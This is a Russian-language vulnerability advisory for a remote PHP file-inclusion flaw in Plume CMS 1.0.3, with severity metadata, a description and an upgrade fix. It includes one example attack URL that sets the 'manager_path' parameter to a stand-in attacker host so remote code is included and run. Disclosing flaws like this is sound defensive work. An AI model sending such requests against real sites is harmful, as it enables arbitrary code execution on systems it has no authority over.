PHP-инклюдинг в Plume CMS

Дата публикации:
03.06.2006
Дата изменения:
24.03.2009
Всего просмотров:
2578
Опасность:
Высокая
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Plume CMS 1.x
Уязвимые версии: Plume CMS 1.0.3, возможно другие версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный код на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "_PX_config[manager_path]" в сценарии "/manager/frontinc/prepend.php". Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена. Пример:

http://victim/manager/frontinc/prepend.php?_PX_config[manager_path]=http://evel.com

URL производителя: www.plume-cms.net

Решение: Установите последнюю версию с сайта производителя.

Журнал изменений:
24.03.2009
Изменена секция "Решение"

Ссылки: Plume CMS Remote File Include

или введите имя

CAPTCHA